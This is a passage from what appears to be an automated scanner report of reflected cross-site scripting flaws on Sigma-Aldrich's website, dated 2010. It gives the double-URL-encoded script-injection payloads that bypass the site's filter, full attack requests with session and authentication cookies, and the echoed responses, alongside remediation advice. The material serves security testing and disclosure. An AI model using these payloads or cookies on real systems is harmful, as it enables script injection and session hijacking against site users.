fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/b0007";alert(1)//9c4b8e8fae9","E404") ;
   </script>
...[SNIP]...

1.35. http://www.sigmaaldrich.com/analytical-chromatography/video.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/video.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c481b%2522%253balert%25281%2529%252f%252f5d2237e005e was submitted in the REST URL parameter 1. This input was echoed as c481b";alert(1)//5d2237e005e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyc481b%2522%253balert%25281%2529%252f%252f5d2237e005e/video.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyc481b";alert(1)//5d2237e005e/video.html","E404") ;
   </script>
...[SNIP]...

1.36. http://www.sigmaaldrich.com/analytical-chromatography/video.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/video.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 875ec%2522%253balert%25281%2529%252f%252f656691d2482 was submitted in the REST URL parameter 2. This input was echoed as 875ec";alert(1)//656691d2482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/875ec%2522%253balert%25281%2529%252f%252f656691d2482 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/875ec";alert(1)//656691d2482","E404") ;
   </script>
...[SNIP]...

1.37. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 738a7%2522%253balert%25281%2529%252f%252fe6da8202b7b was submitted in the REST URL parameter 1. This input was echoed as 738a7";alert(1)//e6da8202b7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author738a7%2522%253balert%25281%2529%252f%252fe6da8202b7b/site-level/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author738a7";alert(1)//e6da8202b7b/site-level/mobile.html","E404") ;
   </script>
...[SNIP]...

1.38. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ad%2522%253balert%25281%2529%252f%252f83dd3b63e22 was submitted in the REST URL parameter 2. This input was echoed as 873ad";alert(1)//83dd3b63e22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author/site-level873ad%2522%253balert%25281%2529%252f%252f83dd3b63e22/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author/site-level873ad";alert(1)//83dd3b63e22/mobile.html","E404") ;
   </script>
...[SNIP]...

1.39. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb38a%2522%253balert%25281%2529%252f%252fda771394f7e was submitted in the REST URL parameter 3. This input was echoed as eb38a";alert(1)//da771394f7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author/site-level/mobile.htmleb38a%2522%253balert%25281%2529%252f%252fda771394f7e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 